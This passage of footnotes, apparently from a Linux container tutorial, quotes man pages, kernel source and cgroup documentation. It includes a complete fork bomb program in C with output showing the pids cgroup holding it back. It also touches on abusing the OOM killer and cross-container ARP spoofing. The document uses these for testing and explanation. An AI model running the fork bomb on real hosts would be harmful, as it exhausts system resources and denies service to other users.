                    clock_settime()  does not  have permission  to set  the
                    clock indicated.

but you can see in the source that CLOCK_REALTIME is the only clock with .clock_set and .clock_adj set:

Listing 161: kernel/time/posix-timers.c:282@c8d2bc

    /*
     * Initialize everything, well, just everything in Posix clocks/timers ;)
     */
    static __init int init_posix_timers(void)
    {
            struct k_clock clock_realtime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_clock_realtime_get,
                    .clock_set      = posix_clock_realtime_set,
                    .clock_adj      = posix_clock_realtime_adj,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_ktime_get_ts,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_monotonic_raw = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_monotonic_raw,
            };
            struct k_clock clock_realtime_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_realtime_coarse,
            };
            struct k_clock clock_monotonic_coarse = {
                    .clock_getres   = posix_get_coarse_res,
                    .clock_get      = posix_get_monotonic_coarse,
            };
            struct k_clock clock_tai = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_tai,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };
            struct k_clock clock_boottime = {
                    .clock_getres   = posix_get_hrtimer_res,
                    .clock_get      = posix_get_boottime,
                    .nsleep         = common_nsleep,
                    .nsleep_restart = hrtimer_nanosleep_restart,
                    .timer_create   = common_timer_create,
                    .timer_set      = common_timer_set,
                    .timer_get      = common_timer_get,
                    .timer_del      = common_timer_del,
            };

            posix_timers_register_clock(CLOCK_REALTIME, &clock_realtime);
            posix_timers_register_clock(CLOCK_MONOTONIC, &clock_monotonic);
            posix_timers_register_clock(CLOCK_MONOTONIC_RAW, &clock_monotonic_raw);
            posix_timers_register_clock(CLOCK_REALTIME_COARSE, &clock_realtime_coarse);
            posix_timers_register_clock(CLOCK_MONOTONIC_COARSE, &clock_monotonic_coarse);
            posix_timers_register_clock(CLOCK_BOOTTIME, &clock_boottime);
            posix_timers_register_clock(CLOCK_TAI, &clock_tai);

            posix_timers_cache = kmem_cache_create("posix_timers_cache",
                                            sizeof (struct k_itimer), 0, SLAB_PANIC,
                                            NULL);
            return 0;
    }

and that those methods go through settimeofday and adjtimex, which are both also gated by CAP_SYS_TIME.

Listing 162: kernel/time/posix-timers.c:212@c8d2bc

    /* Set clock_realtime */
    static int posix_clock_realtime_set(const clockid_t which_clock,
                                        const struct timespec *tp)
    {
            return do_sys_settimeofday(tp, NULL);
    }

    static int posix_clock_realtime_adj(const clockid_t which_clock,
                                        struct timex *t)
    {
            return do_adjtimex(t);
    }

Listing 163: security/commoncap.c:106@c8d2bc

    /**
     * cap_settime - Determine whether the current process may set the system clock
     * @ts: The time to set
     * @tz: The timezone to set
     *
     * Determine whether the current process may set the system clock and timezone
     * information, returning 0 if permission granted, -ve if denied.
     */
    int cap_settime(const struct timespec64 *ts, const struct timezone *tz)
    {
            if (!capable(CAP_SYS_TIME))
                    return -EPERM;
            return 0;
    }

Listing 164: kernel/time/ntp.c:657@c8d2bc

    /**
     * ntp_validate_timex - Ensures the timex is ok for use in do_adjtimex
     */
    int ntp_validate_timex(struct timex *txc)
    {
            if (txc->modes & ADJ_ADJTIME) {
                    /* singleshot must not be used with any other mode bits */
                    if (!(txc->modes & ADJ_OFFSET_SINGLESHOT))
                            return -EINVAL;
                    if (!(txc->modes & ADJ_OFFSET_READONLY) &&
                        !capable(CAP_SYS_TIME))
                            return -EPERM;
            } else {
                    /* In order to modify anything, you gotta be super-user! */
                     if (txc->modes && !capable(CAP_SYS_TIME))
                            return -EPERM;
                    /*
                     * if the quartz is off by more than 10% then
                     * something is VERY wrong!
                     */
                    if (txc->modes & ADJ_TICK &&
                        (txc->tick <  900000/USER_HZ ||
                         txc->tick > 1100000/USER_HZ))
                            return -EINVAL;
            }

            /* ... *
    }

⁶⁶

Listing 165: man 3 adjtime

    ADJTIME(3) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

    NAME
            adjtime - correct the time to synchronize the system clock

            [...]

    ERRORS

            EINVAL
                    The adjustment in delta is outside the permitted range.

            EPERM
                    The caller does not have sufficient privilege to adjust
                    the time.  Under Linux,  the CAP_SYS_TIME capability is
                    required.

⁶⁷

Listing 159: man 2 pciconfig_read

PCICONFIG_READ(2) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	pciconfig_read,  pciconfig_write,   pciconfig_iobase  -  pci
	device information handling
	[...]
ERRORS
	[...]
	EPERM
		User does not have  the CAP_SYS_ADMIN capability.  This
		does not apply to pciconfig_iobase().

⁶⁸

Too many too list, but see man 2 quotactl.

⁶⁹

Listing 143: man 2 ustat

    USTAT(2) -- 2003-08-04 -- Linux -- Linux Programmer's Manual

    NAME
            ustat - get filesystem statistics

    SYNOPSIS
            #include <sys/types.h>
            #include <unistd.h>    /* libc[45] */
            #include <ustat.h>     /* glibc2 */

            int ustat(dev_t dev, struct ustat *ubuf);

    DESCRIPTION
            ustat() returns information about a mounted filesystem.  dev
            is a device number identifying a device containing a mounted
            filesystem.  ubuf  is a  pointer to  a ustat  structure that
            contains the following members:

                daddr_t f_tfree;      /* Total free blocks */
                ino_t   f_tinode;     /* Number of free inodes */
                char    f_fname[6];   /* Filsys name */
                char    f_fpack[6];   /* Filsys pack name */

            The  last   two  fields,   f_fname  and  f_fpack,   are  not
            implemented  and  will  always  be filled  with  null  bytes
            ('\0').

⁷⁰

Listing 142: man 2 sysfs

    SYSFS(2) -- 2010-06-27 -- Linux -- Linux Programmer's Manual

    NAME
            sysfs - get filesystem type information

    SYNOPSIS
            int sysfs(int option, const char *fsname);

            int sysfs(int option, unsigned int fs_index, char *buf);

            int sysfs(int option);

    DESCRIPTION
            sysfs()  returns  information  about  the  filesystem  types
            currently present in  the kernel.  The specific  form of the
            sysfs()  call and  the information  returned depends  on the
            option in effect:

            1  Translate the filesystem identifier  string fsname into a
               filesystem type index.

            2  Translate  the  filesystem  type index  fs_index  into  a
               null-terminated   filesystem  identifier   string.   This
               string will be  written to the buffer pointed  to by buf.
               Make sure that buf has enough space to accept the string.

            3  Return  the total  number of  filesystem types  currently
               present in the kernel.

            The  numbering of  the filesystem  type indexes  begins with
            zero.

⁷¹

Listing 150: man 2 uselib

USELIB(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	uselib - load shared library

	[..]

NOTES
	[...]

	Since Linux  3.15, this system  call is available  only when
	the kernel is configured with the CONFIG_USELIB option.

⁷²

Listing 148: man 2 sync_file_range2

SYNC_FILE_RANGE(2) -- 2014-08-19 -- Linux -- Linux Programmer's Manual

NAME
	sync_file_range - sync a file segment with disk

	[...]
NOTES

   sync_file_range2()
	Some   architectures  (e.g.,   PowerPC,  ARM)   need  64-bit
	arguments to be aligned in a suitable pair of registers.  On
	such architectures, the  call signature of sync_file_range()
	shown in the SYNOPSIS would force a register to be wasted as
	padding  between   the  fd   and  offset   arguments.   (See
	syscall(2)  for  details.)  Therefore,  these  architectures
	define  a different  system call  that orders  the arguments
	suitably:

	    int sync_file_range2(int fd, unsigned int flags,
						off64_t offset, off64_t nbytes);

	The behavior  of this system  call is otherwise  exactly the
	same as sync_file_range().

⁷³

Listing 147: man 2 readdir

READDIR(2) -- 2013-06-21 -- Linux -- Linux Programmer's Manual

NAME
	readdir - read directory entry

SYNOPSIS

	int readdir(unsigned int fd, struct old_linux_dirent *dirp,
			  unsigned int count);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	This is  not the  function you are  interested in.   Look at
	readdir(3)  for the  POSIX conforming  C library  interface.
	This page  documents the bare kernel  system call interface,
	which is superseded by getdents(2).

	readdir()  reads  one  old_linux_dirent structure  from  the
	directory referred  to by  the file  descriptor fd  into the
	buffer pointed to  by dirp.  The argument  count is ignored;
	at most one old_linux_dirent structure is read.

⁷⁴

Listing 168: man 2 kexec_file_load

NAME
	kexec_load, kexec_file_load  - load  a new kernel  for later
	execution
	[...]
ERRORS
	[...]
	EPERM
		The caller does not have the CAP_SYS_BOOT capability.

⁷⁵

Listing 166: man 2 nice

NICE(2) -- 2016-03-15 -- Linux -- Linux Programmer's Manual

NAME
	nice - change process priority

	[...]
ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

⁷⁶

Listing 157: man 2 perfmonctl

PERFMONCTL(2) -- 2013-02-13 -- Linux -- Linux Programmer's Manual

NAME
	perfmonctl - interface to IA-64 performance monitoring unit

	[...]

CONFORMING TO
	perfmonctl() is Linux-specific and  is available only on the
	IA-64 architecture.

⁷⁷

Listing 156: man 2 syscalls

	ppc_rtas(2)	2.6.2	PowerPC only

⁷⁸

Listing 152: man 2 spu_create

SPU_CREATE(2) -- 2015-12-28 -- Linux -- Linux Programmer's Manual

NAME
	spu_create - create a new spu context

SYNOPSIS
	#include <sys/types.h>
	#include <sys/spu.h>

	int spu_create(const char *pathname, int flags, mode_t mode);
	int spu_create(const char *pathname, int flags, mode_t mode,
				int neighbor_fd);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The  spu_create() system  call is  used on  PowerPC machines
	that  implement the  Cell Broadband  Engine Architecture  in
	order  to access  Synergistic  Processor  Units (SPUs).   It
	creates a  new logical  context for an  SPU in  pathname and
	returns a file descriptor associated with it.  pathname must
	refer to a  nonexistent directory in the mount  point of the
	SPU filesystem  (spufs).  If  spu_create() is  successful, a
	directory is  created at pathname  and it is  populated with
	the files described in spufs(7).

⁷⁹

Listing 153: man 2 spu_run

SPU_RUN(2) -- 2012-08-05 -- Linux -- Linux Programmer's Manual

NAME
	spu_run - execute an SPU context

SYNOPSIS
	#include <sys/spu.h>

	int spu_run(int fd, unsigned int *npc, unsigned int *event);

	Note: There  is no glibc  wrapper for this system  call; see
	NOTES.

DESCRIPTION
	The spu_run() system  call is used on  PowerPC machines that
	implement the Cell Broadband Engine Architecture in order to
	access Synergistic Processor Units  (SPUs).  The fd argument
	is a  file descriptor returned by  spu_create(2) that refers
	to a specific SPU context.   When the context gets scheduled
	to a  physical SPU, it  starts execution at  the instruction
	pointer passed in npc.

⁸⁰

Listing 151: man 2 subpage_prot

SUBPAGE_PROT(2) -- 2012-07-13 -- Linux -- Linux Programmer's Manual

NAME
	subpage_prot -  define a  subpage protection for  an address
	range

	[...]

VERSIONS
	This  system call  is provided  on the  PowerPC architecture
	since Linux 2.6.25.  The system call is provided only if the
	kernel is configured  with CONFIG_PPC_64K_PAGES.  No library
	support is provided.

⁸¹

Listing 149: man 2 syscalls

	utrap_install(2)	2.2	Sparc only

⁸²

Listing 144: man 2 syscalls

	kern_features(2)	3.7	Sparc64

This is pretty vague, so I looked at the source. It's only mentioned in an Sparc64-specific file:

Listing 145: arch/sparc/kernel/sys_sparc_64.c:648@c8d2bc

asmlinkage long sys_kern_features(void)
{
	return KERN_FEATURE_MIXED_MODE_STACK;
}

⁸³

Listing 155: man 2 preadv2

DESCRIPTION
	The readv() system  call reads iovcnt buffers  from the file
	associated  with the  file  descriptor fd  into the  buffers
	described by iov ("scatter input").

	The  writev()  system call  writes  iovcnt  buffers of  data
	described  by  iov to  the  file  associated with  the  file
	descriptor fd ("gather output").

	[...]

	The readv() system call works  just like read(2) except that
	multiple buffers are filled.

	The  writev() system  call works  just like  write(2) except
	that multiple buffers are written out.

	[...]

   preadv() and pwritev()
	The  preadv()  system  call combines  the  functionality  of
	readv() and pread(2).  It performs the same task as readv(),
	but adds a fourth argument, offset, which specifies the file
	offset at which the input operation is to be performed.

	The  pwritev() system  call  combines  the functionality  of
	writev()  and  pwrite(2).   It  performs the  same  task  as
	writev(),  but   adds  a  fourth  argument,   offset,  which
	specifies the file  offset at which the  output operation is
	to be performed.

	The file offset  is not changed by these  system calls.  The
	file referred to by fd must be capable of seeking.

   preadv2() and pwritev2()

	These  system calls  are similar  to preadv()  and pwritev()
	calls, but add  a fifth argument, flags,  which modifies the
	behavior on a per-call basis.

	Unlike preadv() and pwritev(), if the offset argument is -1,
	then the current file offset is used and updated.

	The flags argument contains a bitwise  OR of zero or more of
	the following flags:

	RWF_DSYNC (since Linux 4.7)
		Provide a  per-write equivalent of the  O_DSYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

	RWF_HIPRI (since Linux 4.6)
		High    priority   read/write.     Allows   block-based
		filesystems  to  use  polling   of  the  device,  which
		provides   lower  latency,   but  may   use  additional
		resources.  (Currently, this feature  is usable only on
		a file descriptor opened using the O_DIRECT flag.)

	RWF_SYNC (since Linux 4.7)
		Provide a  per-write equivalent  of the  O_SYNC open(2)
		flag.  This flag is meaningful only for pwritev2(), and
		its effect  applies only to  the data range  written by
		the system call.

⁸⁴

This isn't just a denial-of-service concern. If a process consumes a lot of memory, and has a better badness score than some other critical host-side process, the host-side process will be killed by the kernel's out-of-memory killer.

The badness score favors longer-running processes, among other things:

"Taming the OOM Killer" on LWN:

The process to be killed in an out-of-memory situation is selected based on its badness score. The badness score is reflected in /proc/<pid>/oom_score. This value is determined on the basis that the system loses the minimum amount of work done, recovers a large amount of memory, doesn't kill any innocent process eating tons of memory, and kills the minimum number of processes (if possible limited to one). The badness score is computed using the original memory size of the process, its CPU time (utime + stime), the run time (uptime - start time) and its oom_adj value. The more memory the process uses, the higher the score. The longer a process is alive in the system, the smaller the score.

I haven't demonstrated it, but I believe this could manipulated to cause a screen lock program to be killed, for example. It's not unheard of for e.g. xscreensaver to leak memory:

"gltext seems to leak memory eventually causing oom-killer to run":

gltext is consuming large amounts of memory. Often being killed by oom-killer but eventually causing me not to be able to log into my computer disabling gltext from the list of possible screensavers caused the problem to go away.

There's even an open Ubuntu xscreensaver bug to make the OOM killer more likely to kill xscreensaver. This seems like the wrong direction to me….

"xscreensaver does not protect the system against its children":

The thing is, a screensaver is NOT a critically important part of the system. It should die early if it is a resource hog. All you have to do is write "10" into /proc/PID/oom_adj and Bob's your uncle. Until then, Xscreensaver is failing its duties.

⁸⁵

Listing 174: man 7 cgroup_namespaces

	Cgroup namespaces virtualize the view of a process's cgroups
	(see   cgroups(7))  as   seen  via   /proc/[pid]/cgroup  and
	/proc/[pid]/mountinfo.

	Each  cgroup  namespace  has  its own  set  of  cgroup  root
	directories,  which are  the  base points  for the  relative
	locations displayed  in /proc/[pid]/cgroup.  When  a process
	creates a new cgroup  namespace using clone(2) or unshare(2)
	with  the  CLONE_NEWCGROUP  flag,  it enters  a  new  cgroup
	namespace in  which its  current cgroups  directories become
	the  cgroup root  directories of  the new  namespace.  (This
	applies both for  the cgroups version 1  hierarchies and the
	cgroups version 2 unified hierarchy.)

⁸⁶

Listing 175: Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.limit_in_bytes		 # set/show limit of memory usage

⁸⁷

Listing 176: Documentation/cgroup-v1/memory.txt@c8d2bc

Brief summary of control files.
[...]
 memory.kmem.limit_in_bytes      # set/show hard limit for kernel memory

⁸⁸

Listing 179: man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.

	cpu (since Linux 2.6.24; CONFIG_CGROUP_SCHED)
		Cgroups  can be  guaranteed  a minimum  number of  "CPU
		shares" when a  system is busy.  This does  not limit a
		cgroup's CPU usage if the CPUs are not busy.

		Further information  can be found in  the kernel source
		file Documentation/scheduler/sched-bwc.txt.

⁸⁹

Listing 177: Documentation/cgroup-v1/pids.txt@c8d2bc

						   Process Number Controller
						   =========================

Abstract
--------

The process number controller is used to allow a cgroup hierarchy to stop any
new tasks from being fork()'d or clone()'d after a certain limit is reached.

Since it is trivial to hit the task limit without hitting any kmemcg limits in
place, PIDs are a fundamental resource. As such, PID exhaustion must be
preventable in the scope of a cgroup hierarchy by allowing resource limiting of
the number of tasks in a cgroup.

Usage
-----

In order to use the `pids` controller, set the maximum number of tasks in
pids.max (this is not available in the root cgroup for obvious reasons). The
number of processes currently in the cgroup is given by pids.current.

for example,

Listing 178: forkbomb.c

/* -*- compile-command: "gcc -Wall -Werror -static forkbomb.c -o forkbomb" -*- */
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main (int argc, char  **argv)
{
	switch (fork()) {
	case -1:
		fprintf(stderr, "++ couldn't even fork once: %m\n");
		return 1;
	case 0:
		while (1) {
			switch (fork()) {
			case -1:
				break;
			case 0:
				fprintf(stderr, "++ successful fork.\n");
				break;
			default:
				break;
				
			}
		}
		break;
	default:
		while (1) sleep(1);
		break;
	}
	return 0;
}

[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c forkbomb
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.0sOZgF...done.
=> trying a user namespace...writing /proc/2184/uid_map...writing /proc/2184/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
++ successful fork.
C-c C-c

⁹⁰

Listing 180: Documentation/cgroup-v1/blkio-controller.txt@c8d2bc

Details of cgroup files
=======================
Proportional weight policy files
--------------------------------
- blkio.weight
	- Specifies per cgroup weight. This is default weight of the group
	  on all the devices until and unless overridden by per device rule.
	  (See blkio.weight_device).
	  Currently allowed range of weights is from 10 to 1000.

⁹¹

Listing 182: man 7 cgroups

   Creating cgroups and moving processes
	A cgroup filesystem initially contains a single root cgroup,
	'/', which all processes belong to.  A new cgroup is created
	by creating a directory in the cgroup filesystem:

	    mkdir /sys/fs/cgroup/cpu/cg1

	This creates a new empty cgroup.

	A process  may be moved  to this  cgroup by writing  its PID
	into the cgroup's cgroup.procs file:

	    echo $$ > /sys/fs/cgroup/cpu/cg1/cgroup.procs

	Only one PID at a time should be written to this file.

	Writing  the  value 0  to  a  cgroup.procs file  causes  the
	writing process to be moved to the corresponding cgroup.

	When writing a PID into the cgroup.procs, all threads in the
	process are moved into the new cgroup at once.

	Within a hierarchy, a process can be a member of exactly one
	cgroup.   Writing a  process's  PID to  a cgroup.procs  file
	automatically removes  it from  the cgroup  of which  it was
	previously a member.

	The cgroup.procs  file can be read  to obtain a list  of the
	processes that are  members of a cgroup.   The returned list
	of  PIDs is  not  guaranteed  to be  in  order.   Nor is  it
	guaranteed to  be free of  duplicates.  (For example,  a PID
	may be recycled while reading from the list.)

	In cgroups v1 (but not cgroups v2), an individual thread can
	be moved to  another cgroup by writing its  thread ID (i.e.,
	the kernel thread ID returned  by clone(2) and gettid(2)) to
	the tasks file in a cgroup directory.  This file can be read
	to  discover the  set of  threads  that are  members of  the
	cgroup.  This file is not present in cgroup v2 directories.

⁹²

Listing 184: man 2 setrlimit

	The soft limit is the value that the kernel enforces for the
	corresponding resource.   The hard  limit acts as  a ceiling
	for the soft limit: an unprivileged process may set only its
	soft limit  to a value  in the range from  0 up to  the hard
	limit,  and   (irreversibly)  lower   its  hard   limit.   A
	privileged    process   (under    Linux:   one    with   the
	CAP_SYS_RESOURCE capability)  may make arbitrary  changes to
	either limit value.

⁹³

Listing 186: Documentation/cgroup-v1/cgroups.txt@c8d2bc

1.4 What does notify_on_release do ?
------------------------------------

If the notify_on_release flag is enabled (1) in a cgroup, then
whenever the last task in the cgroup leaves (exits or attaches to
some other cgroup) and the last child cgroup of that cgroup
is removed, then the kernel runs the command specified by the contents
of the "release_agent" file in that hierarchy's root directory,
supplying the pathname (relative to the mount point of the cgroup
file system) of the abandoned cgroup.  This enables automatic
removal of abandoned cgroups.  The default value of
notify_on_release in the root cgroup at system boot is disabled
(0).  The default value of other cgroups at creation is the current
value of their parents' notify_on_release settings. The default value of
a cgroup hierarchy's release_agent path is empty.

It's annoying to set the release agent on a per-container basis, so we'll avoid it.

⁹⁴

Listing 188: "Cross-Container ARP Poisoning", an LXC bug report by Jesse Hertz of NCCGroup

Description:

An unprivileged LXC container can conduct an ARP spoofing attack
against another unprivileged LXC container running on the same
host. This allows man-in-the-middle attacks on another container's
traffic.

Recommendation:

Due to the complex nature of this involving the Linux bridge
interface, NCC is not aware of an easy fix. We suggest involving the
kernel networking team to allow for ARP restrictions on virtual bridge
interfaces. Using ebtables to block and control link layer traffic may
also be an effective fix. Documentation should reflect the risks of
not using any future protections or ebtables.

Stéphane Graber (stgraber) wrote on 2016-02-22:	#1
Hi,

Thanks for the report. This is not exactly news to us and has been
mentioned publicly a few times.

Our usual answer to this is that if you don't trust your users, you
shouldn't grant them access to a shared bridge, instead setup a
separate bridge for them.

MAC filtering through ebtables is an option but the problem with this
approach is that it essentially prevents container nesting as that
would lead to more than one MAC being used by the container which
ebtables would block.

[...]

On a local system, our answer to that is as I said to either trust
everyone you give access to a shared bridge or to segment traffic by
using multiple bridges.

⁹⁵

Listing 189: man 7 cgroups

   Cgroups version 1 controllers
	Each of the  cgroups version 1 controllers is  governed by a
	kernel configuration  option (listed  below).  Additionally,
	the availability of  the cgroups feature is  governed by the
	CONFIG_CGROUPS kernel configuration option.
[...]

	net_prio (since Linux 3.3; CONFIG_CGROUP_NET_PRIO)
		This  allows priorities  to be  specified, per  network
		interface, for cgroups.

		Further information  can be found in  the kernel source
		file Documentation/cgroup-v1/net_prio.txt.